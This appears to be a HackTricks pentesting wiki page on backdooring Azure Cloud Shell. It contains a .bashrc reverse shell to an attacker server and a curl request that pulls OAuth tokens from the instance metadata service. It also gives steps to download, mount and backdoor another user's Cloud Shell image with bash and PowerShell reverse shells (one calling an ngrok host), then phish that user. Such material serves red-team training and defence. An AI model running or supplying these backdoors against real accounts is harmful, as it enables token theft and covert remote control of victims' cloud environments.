# Az - Cloud Shell Persistence {{#include ../../../banners/hacktricks-training.md}} ## Cloud Shell Persistence Azure Cloud Shell offers command-line access to manage Azure resources with persistent storage and automatic authentication. Attackers can exploit this by placing backdoors in the persistent home directory: * **Persistent Storage**: Azure Cloud Shell’s home directory is mounted on an Azure file share and remains intact even after the session ends. * **Startup Scripts**: Files like `.bashrc` or `config/PowerShell/Microsoft.PowerShell_profile.ps1` execute automatically at the start of each session, allowing for persistent execution when the cloud shell starts. Example backdoor in .bashrc: ```bash echo '(nohup /usr/bin/env /bin/bash 2>/dev/null -norc -noprofile >& /dev/tcp/$CCSERVER/443 0>&1 &)' >> $HOME/.bashrc ``` This backdoor can execute commands even 5 minutes after the cloud shell is finished by the user. Additionally query Azure’s metadata service for instance details and tokens: ```bash curl -H "Metadata:true" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/" -s ``` ### Cloud Shell Phishing If an attacker finds other users images in a Storage Accout he has write and read access to, he will be able to download the image, **add a bash and PS backdoor into it**, and upload it back to the Storage Account so next time the user access the shell, the **commands will be automatically executed**. - **Download, backdoor and uplaod the image:** ```bash # Download image mkdir /tmp/phishing_img az storage file download-batch -d /tmp/phishing_img --account-name -s # Mount the image mkdir /tmp/backdoor_img sudo mount ./.cloudconsole/acc_carlos.img /tmp/backdoor_img cd /tmp/backdoor_img # Create backdoor mkdir .config mkdir .config/PowerShell touch .config/PowerShell/Microsoft.PowerShell_profile.ps1 chmod 777 .config/PowerShell/Microsoft.PowerShell_profile.ps1 # Bash backdoor echo '(nohup /usr/bin/env /bin/bash 2>/dev/null -norc -noprofile >& /dev/tcp/${SERVER}/${PORT} 0>&1 &)' >> .bashrc # PS backdoor echo '$client = New-Object System.Net.Sockets.TCPClient("7.tcp.eu.ngrok.io",19838);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' >> .config/PowerShell/Microsoft.PowerShell_profile.ps1 # Unmount cd /tmp sudo umount /tmp/backdoor_img # Upload image az storage file upload --account-name --path ".cloudconsole/acc_username.img" --source "./tmp/phishing_img/.cloudconsole/acc_username.img" -s ``` - **Then, phish the user to access https://shell.azure.com/** {{#include ../../../banners/hacktricks-training.md}}